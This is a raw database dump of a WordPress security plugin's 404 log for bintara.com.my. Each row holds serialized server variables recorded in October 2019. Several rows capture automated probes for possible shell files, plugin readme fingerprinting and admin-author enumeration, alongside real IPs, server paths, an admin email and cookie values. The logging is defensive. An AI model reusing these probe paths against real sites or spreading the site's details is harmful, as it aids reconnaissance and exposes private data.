Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"58742\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xag-0QSv6QovRW0DK2k@HQAAAM8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571307473.6238\";s:12:\"REQUEST_TIME\";s:10:\"1571307473\";}}','notice','2019-10-17 10:17:55','2019-10-17 10:17:53',35019288,36818224,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(28213,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:49:\"/test/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:71:\"https://bintara.com.my/test/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:49:\"/test/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XahEhjaIzmjKT0uBEUqphQAAABM\";s:19:\"REDIRECT_SCRIPT_URI\";s:71:\"https://bintara.com.my/test/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:49:\"/test/wp-content/plugins/solid_best_corp/info.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XahEhjaIzmjKT0uBEUqphQAAABM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"103.7.58.17\";s:11:\"REMOTE_PORT\";s:5:\"34472\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:71:\"https://bintara.com.my/test/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:49:\"/test/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XahEhjaIzmjKT0uBEUqphQAAABM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571308678.8191\";s:12:\"REQUEST_TIME\";s:10:\"1571308678\";}}','notice','2019-10-17 10:38:01','2019-10-17 10:37:59',35668696,37471544,'https://bintara.com.my/test/wp-content/plugins/solid_best_corp/info.php',1,0,'103.7.58.17'),(28214,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:48:\"/test/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/test/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:48:\"/test/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XahEjwDM-LBvHfklr3kdoQAAAEg\";s:19:\"REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/test/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:48:\"/test/wp-content/plugins/solid_best_corp/sys.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XahEjwDM-LBvHfklr3kdoQAAAEg\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"103.7.58.17\";s:11:\"REMOTE_PORT\";s:5:\"35440\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:70:\"https://bintara.com.my/test/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:48:\"/test/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XahEjwDM-LBvHfklr3kdoQAAAEg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571308687.5743\";s:12:\"REQUEST_TIME\";s:10:\"1571308687\";}}','notice','2019-10-17 10:38:09','2019-10-17 10:38:07',35045040,36846792,'https://bintara.com.my/test/wp-content/plugins/solid_best_corp/sys.php',1,0,'103.7.58.17'),(28280,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:42:\"/wp-content/plugins/astra-sites/readme.txt\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:23:\"en-US,en;q=0.8,ru;q=0.6\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/wp-content/plugins/astra-sites/readme.txt\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:42:\"/wp-content/plugins/astra-sites/readme.txt\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XambKE4GZAhSKnwjBMzybgAAAAk\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/wp-content/plugins/astra-sites/readme.txt\";s:19:\"REDIRECT_SCRIPT_URL\";s:42:\"/wp-content/plugins/astra-sites/readme.txt\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XambKE4GZAhSKnwjBMzybgAAAAk\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"193.112.253.3\";s:11:\"REMOTE_PORT\";s:5:\"59076\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:64:\"https://bintara.com.my/wp-content/plugins/astra-sites/readme.txt\";s:10:\"SCRIPT_URL\";s:42:\"/wp-content/plugins/astra-sites/readme.txt\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XambKE4GZAhSKnwjBMzybgAAAAk\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571396392.344\";s:12:\"REQUEST_TIME\";s:10:\"1571396392\";}}','notice','2019-10-18 10:59:55','2019-10-18 10:59:53',35174304,36975152,'https://bintara.com.my/wp-content/plugins/astra-sites/readme.txt',1,0,'193.112.253.3'),(28281,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=61c025b4d3f1eebe8ca80bc6a10ac08f\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"63360\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XambOODM3oDzMu3E5gMYnQAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571396408.8553\";s:12:\"REQUEST_TIME\";s:10:\"1571396408\";}}','notice','2019-10-18 11:00:11','2019-10-18 11:00:09',34924136,36744688,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(28282,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:41:\"/wp-content/plugins/pushengage/README.txt\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:23:\"en-US,en;q=0.8,ru;q=0.6\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:63:\"https://bintara.com.my/wp-content/plugins/pushengage/README.txt\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:41:\"/wp-content/plugins/pushengage/README.txt\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XambTvmhtecMB5k7bacr0wAAAQM\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:63:\"https://bintara.com.my/wp-content/plugins/pushengage/README.txt\";s:19:\"REDIRECT_SCRIPT_URL\";s:41:\"/wp-content/plugins/pushengage/README.txt\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XambTvmhtecMB5k7bacr0wAAAQM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:12:\"217.69.10.58\";s:11:\"REMOTE_PORT\";s:5:\"57180\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:63:\"https://bintara.com.my/wp-content/plugins/pushengage/README.txt\";s:10:\"SCRIPT_URL\";s:41:\"/wp-content/plugins/pushengage/README.txt\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XambTvmhtecMB5k7bacr0wAAAQM\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571396430.7605\";s:12:\"REQUEST_TIME\";s:10:\"1571396430\";}}','notice','2019-10-18 11:00:33','2019-10-18 11:00:31',35173008,36971080,'https://bintara.com.my/wp-content/plugins/pushengage/README.txt',1,0,'217.69.10.58'),(28283,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:55:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:42:\"/wp-content/plugins/astra-sites/readme.txt\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:23:\"en-US,en;q=0.8,ru;q=0.6\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=3a29f7717d29dc43b9ba27bedb8b0eeb\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/wp-content/plugins/astra-sites/readme.txt\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:42:\"/wp-content/plugins/astra-sites/readme.txt\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XambUODM3oDzMu3E5gMYwwAAAI8\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/wp-content/plugins/astra-sites/readme.txt\";s:19:\"REDIRECT_SCRIPT_URL\";s:42:\"/wp-content/plugins/astra-sites/readme.txt\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XambUODM3oDzMu3E5gMYwwAAAI8\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"47.75.125.146\";s:11:\"REMOTE_PORT\";s:5:\"48675\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:64:\"https://bintara.com.my/wp-content/plugins/astra-sites/readme.txt\";s:10:\"SCRIPT_URL\";s:42:\"/wp-content/plugins/astra-sites/readme.txt\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XambUODM3oDzMu3E5gMYwwAAAI8\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571396432.2363\";s:12:\"REQUEST_TIME\";s:10:\"1571396432\";}}','notice','2019-10-18 11:00:34','2019-10-18 11:00:32',35176480,36978936,'https://bintara.com.my/wp-content/plugins/astra-sites/readme.txt',1,0,'47.75.125.146'),(28284,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=eda16190cfafb876daa097d48e000b06\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"64244\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XambVHpVms2l1djUPbQaDAAAAEs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571396436.3231\";s:12:\"REQUEST_TIME\";s:10:\"1571396436\";}}','notice','2019-10-18 11:00:38','2019-10-18 11:00:36',34924136,36744688,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(28287,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/author/admin/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 